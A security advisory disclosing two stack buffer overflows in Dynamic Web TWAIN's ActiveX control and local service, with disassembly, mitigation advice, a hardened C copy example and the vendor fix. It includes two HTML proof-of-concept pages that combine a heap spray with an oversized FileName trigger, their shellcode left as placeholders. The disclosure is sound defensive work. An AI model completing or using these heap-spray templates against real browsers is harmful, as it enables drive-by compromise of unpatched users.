SSD Advisory – Dynamic Web TWAIN SDK Vulnerabilities

Introduction
Dynamic Web TWAIN is a TWAIN-based scanning SDK software specifically designed for web applications. With just a few lines of code, you can develop robust applications to scan documents from TWAIN-compatible scanners, edit the scanned images and save them to a file system.
Vulnerability Details
Two security vulnerabilities have been found in Dynamic Web TWAIN:

  • DynamicWebTwainCtrl.DynamicWebTwain.1 ActiveXObject SaveAllAsPDF/SaveAsPDF Methods lstrcpyA() Call Stack Buffer Overflow Vulnerability
  • WebTWAINService.exe Service SaveAllAsPDF/SaveAsPDF Methods lstrcpyA() Call Stack Buffer Overflow Vulnerability

DynamicWebTwainCtrl.DynamicWebTwain.1 ActiveXObject SaveAllAsPDF/SaveAsPDF Methods lstrcpyA() Call Stack Buffer Overflow Vulnerability
The Dynamic Web TWAIN installs an ActiveX control with the following settings:

CLSID: {FFC6F181-A5CF-4ec4-A441-093D7134FBF2}
Progid: DynamicWebTwainCtrl.DynamicWebTwain.1
Binary Path: C:\Windows\SysWOW64\Dynamsoft\DynamicWebTwain\DynamicWebTwainCtrlTrial.dll
Implements IObjectSafety: False
Safe For Scripting (Registry): True
Safe For Initialization (Registry): True

Because the registry marks the control as both safe for scripting and safe for initialization, Internet Explorer will instantiate it and let page script call its properties and methods, subject only to the user's security zone settings. The control does not implement IObjectSafety itself, so these registry category entries are the only thing vouching for it; removing them, or setting the kill bit for the CLSID, stops Internet Explorer from loading the control and is a reasonable stop-gap until the fixed version is deployed.
The ActiveX exposes the SaveAllAsPDF and SaveAsPDF methods, see typelib:

...
/* DISPID=355 */
/* VT_BOOL [11] */
function SaveAllAsPDF(
/* VT_BSTR [8] [in] */ $FileName <--------------
)
{
/* method SaveAllAsPDF */
}
/* DISPID=354 */
/* VT_BOOL [11] */
function SaveAsPDF(
/* VT_BSTR [8] [in] */ $FileName, <--------------
/* VT_I2 [2] [in] */ $sImageIndex
)
{
/* method SaveAsPDF */
}
...

The FileName parameter of both methods is the source of a stack buffer overflow: DynamicWebTwainCtrlTrial.dll copies it with lstrcpyA() into a fixed-size stack buffer (at [ebp-124h], i.e. 292 bytes, in the listing below) without any length check, so a FileName longer than the buffer overwrites the saved frame pointer and return address.
Vulnerable Code
Vulnerable code inside DynamicWebTwainCtrlTrial.dll:

;----------------------------------------------------------------------------------------------------
 1003324F                           SUB_L1003324F:
...
 10033290  F3AB                      		rep stosd
 10033292  66AB                      		stosw
 10033294  AA                        		stosb
 10033295  8D85DCFEFFFF              		lea	eax,[ebp-00000124h]
 1003329B  50                        		push	eax
 1003329C  FF159C720710              		call	[KERNEL32.dll!lstrcpyA]   <---------
 100332A2  8D85DCFEFFFF              		lea	eax,[ebp-00000124h]
 100332A8  6A04                      		push	00000004h
 100332AA  50                        		push	eax
...
;----------------------------------------------------------------------------

Exploit

<html>
<object classid="clsid:FFC6F181-A5CF-4ec4-A441-093D7134FBF2" id="obj">
</object>
<body>
<div id="blah"></div>
<script>
// Heap spray: fill the browser process heap with 0x0c0c0c0c-filled strings so that
// a hijacked pointer into the sprayed region lands on attacker-controlled data.
var div_container = document.getElementById("blah");
div_container.style.cssText = "display:none";
var data;
offset = 0x100;
junk = unescape("%u0c0c%u0c0c");
while (junk.length < 0x1000) junk += junk;
rop = unescape("%u4141%u4141");       // placeholder for a ROP chain
shellcode = unescape("%u4141%u4141"); // placeholder for shellcode
data = junk.substring(0, offset) + rop + shellcode;
data += junk.substring(0, 0x800 - offset - rop.length - shellcode.length);
while (data.length < 0x80000) data += data;
for (var i = 0; i < 0x800; i++) {
    var x = document.createElement("button");
    x.title = data.substring(0, 0x40000 - 0x58);
    div_container.appendChild(x);
}
// Trigger: a 500-byte FileName overruns the 0x124-byte stack buffer that lstrcpyA() copies into.
var xx = "";
for (i = 0; i < 500; i++) {
    xx = xx + "A";
}
obj.SaveAllAsPDF(xx);
//obj.SaveAsPDF(xx, 1);
</script>
</body>
</html>

WebTWAINService.exe Service SaveAllAsPDF/SaveAsPDF Methods lstrcpyA() Call Stack Buffer Overflow Vulnerability
Similar to the above ActiveX, WebTWAINService.exe, the local service that handles requests sent from the user's web browser, is vulnerable to the same unbounded lstrcpyA() copy of the FileName value; only the delivery vector differs, so browsers without ActiveX support are also affected.
Vulnerable Code
Vulnerable code inside the WebTWAINService.exe:

;----------------------------------------------------------------------------------------------------
 00462CE0                           CASE_PROCTABLE_00462CE0:
 00462CE0  282B4600                 		dd	CASE_00462CE0_PROC0000
 00462CE4  282B4600                 		dd	CASE_00462CE0_PROC0000
 00462CE8  4E2B4600                 		dd	CASE_00462CE0_PROC0002
 00462CEC  282B4600                 		dd	CASE_00462CE0_PROC0000
 00462CF0  3B2B4600                 		dd	CASE_00462CE0_PROC0004
 00462CF4  CCCCCCCCCCCCCCCCCCCC+     		Align	16
 00462D00                           SUB_L00462D00:
 00462D00  6AFF                      		push	FFFFFFFFh
...
 00462D8A  56                        		push	esi
 00462D8B  8D542440                  		lea	edx,[esp+40h]
 00462D8F  52                        		push	edx
 00462D90  FF1564034E00              		call	[KERNEL32.dll!lstrcpyA] <--------- vulnerable call
...
;----------------------------------------------------------------------------------------------------
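The following is an added example, not code from the advisory or from Dynamsoft, showing the vulnerable copy pattern described for both DynamicWebTwainCtrlTrial.dll and WebTWAINService.exe beside a hardened version. It uses portable strcpy() as a stand-in for lstrcpyA(), takes the 0x124-byte buffer size from the "lea eax,[ebp-124h]" in the ActiveX listing (the service's buffer at [esp+40h] has no size visible on this page, so the same constant is assumed for illustration), and constructs the 500-byte FileName the first PoC sends. Function names and the VARIANT_BOOL-style return values are assumptions made for the example.

```c
#include <stdio.h>
#include <string.h>

/* Destination buffer size inferred from "lea eax,[ebp-124h]" in the control's
   disassembly: 0x124 = 292 bytes sit between the buffer and the saved EBP. */
#define FILENAME_BUF 0x124
/* Length of the FileName string the first PoC builds ("A" repeated 500 times). */
#define POC_LEN 500

/* Bounded length: bytes before the NUL, or limit if no NUL is found. */
static size_t bounded_len(const char *s, size_t limit)
{
    size_t n = 0;
    while (n < limit && s[n] != '\0')
        n++;
    return n;
}

/* Vulnerable shape (mirrors the advisory's lstrcpyA call): strcpy/lstrcpyA stop
   only at the NUL of the source, never at the end of the destination. Calling
   this with FILENAME_BUF bytes or more overwrites the saved frame pointer and
   return address; the example never does so. */
static int save_as_pdf_vulnerable(const char *filename)
{
    char path[FILENAME_BUF];
    strcpy(path, filename);            /* lstrcpyA(path, filename) on Windows */
    return (int)strlen(path);          /* stand-in for "bytes of path written" */
}

/* Hardened copy: reject anything that does not fit, NUL included, rather than
   truncating silently (a silently truncated output path is itself a bug). */
static int copy_filename_checked(char *dst, size_t dstsz, const char *src)
{
    size_t n = bounded_len(src, dstsz);
    if (n == dstsz)                    /* no NUL within dstsz bytes: too long */
        return -1;
    memcpy(dst, src, n + 1);           /* n + 1 <= dstsz, so the copy is in bounds */
    return 0;
}

/* Fixed shape: same stack buffer, but the length check runs before the copy.
   Returns 1 on success, 0 on rejection (the COM method returns VARIANT_BOOL). */
static int save_as_pdf_fixed(const char *filename)
{
    char path[FILENAME_BUF];
    if (copy_filename_checked(path, sizeof path, filename) != 0)
        return 0;
    return 1;
}

/* Constructed input: the 500 x 'A' FileName the exploit passes to SaveAllAsPDF. */
static void make_poc_filename(char *out, size_t outsz)
{
    size_t i;
    for (i = 0; i + 1 < outsz && i < POC_LEN; i++)
        out[i] = 'A';
    out[i] = '\0';
}

/* 1 if the hardened method rejects the PoC FileName, 0 otherwise. */
static int poc_is_rejected(void)
{
    char poc[POC_LEN + 1];
    make_poc_filename(poc, sizeof poc);
    return save_as_pdf_fixed(poc) == 0;
}

/* Bytes by which the PoC string plus its NUL runs past the end of the buffer. */
static int poc_overrun_bytes(void)
{
    return (int)(POC_LEN + 1 - FILENAME_BUF);
}

int main(void)
{
    printf("normal path accepted:   %d\n", save_as_pdf_fixed("C:\\scans\\out.pdf"));
    printf("PoC path rejected:      %d\n", poc_is_rejected());
    printf("PoC overruns buffer by: %d bytes\n", poc_overrun_bytes());
    return 0;
}
```

The fixed version fails closed: an over-long FileName makes the method return false instead of being copied. On Windows the equivalent bounded call is StringCchCopyA(), which also returns an error rather than truncating silently; lstrcpynA() truncates, which avoids the overflow but can write to an unexpected path.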

Exploit

<!DOCTYPE html>
<html>
<head>
<title>
	Dynamic Web TWAIN POC 02
</title>
<script>
function spray(){
    var x=[];
    for(i=0;i<300000;i++){x.push(new String("AAAA"))}
}
function crash(){
    // Oversized FileName values handed to the vendor's JS API, which relays them to WebTWAINService.exe
    var x=""; for(i=0;i<1000000;i++){x+="AAAA"}
    var y=""; for(i=0;i<100000;i++){y+="AAAA"}
    // Pick the call path by engine: the bare ActiveX object only exists in Internet Explorer
    var a=window.navigator.appVersion;
    var isWebKit=(a.match(/AppleWebKit/)!==null);
    if (!isWebKit){try{
        dwtcontrolContainer_Obj.SaveAllAsPDF(x) // Internet Explorer
    }
    catch(e){}};
    // dwtcontrolContainer_Obj and DWObject are expected to be created by the vendor scripts included below
    DWObject.SaveAsPDF(x); // Google Chrome, Firefox, Opera
}
</script>
<script type="text/javascript" language="javascript" src="Resources/dynamsoft.webtwain.initiate.js?t=150417"></script>
<script type="text/javascript" language="javascript" src="Resources/dynamsoft.webtwain.config.js"></script>
<script type="text/javascript" language="javascript" src="Scripts/online_demo_operation.js"></script>
<script type="text/javascript" language="javascript" src="Scripts/online_demo_initpage.js"></script>
<script type="text/javascript" language="javascript" src="Scripts/jquery.js"></script>
</head>
<body>
<div id="blah"></div>
<div id="DWTcontainer" class="body_Broad_width">
     <div id="dwtcontrolContainer"></div>
     <div id="DWTNonInstallContainerID"></div>
     <div id="DWTemessageContainer"></div>
</div>
<script>
// Heap spray, same layout as in the first PoC
var div_container = document.getElementById("blah");
div_container.style.cssText = "display:none";
var data;
offset = 0x100;
junk = unescape("%u0c0c%u0c0c");
while (junk.length < 0x1000) junk += junk;
rop = unescape("%u4141%u4141");       // placeholder for a ROP chain
shellcode = unescape("%u4141%u4141"); // placeholder for shellcode
data = junk.substring(0, offset) + rop + shellcode;
data += junk.substring(0, 0x800 - offset - rop.length - shellcode.length);
while (data.length < 0x80000) data += data;
for (var i = 0; i < 0x800; i++) {
    var x = document.createElement("button");
    x.title = data.substring(0, 0x40000 - 0x58);
    div_container.appendChild(x);
}
// Give the vendor scripts time to initialise the control before triggering the overflow
setTimeout(function(){crash()},6000);
</script>
</body>
</html>

Vendor Response
Dynamic Web TWAIN version 11.3 has been released to address the above listed issues: http://www.dynamsoft.com/Downloads/WebTWAIN_Download.aspx.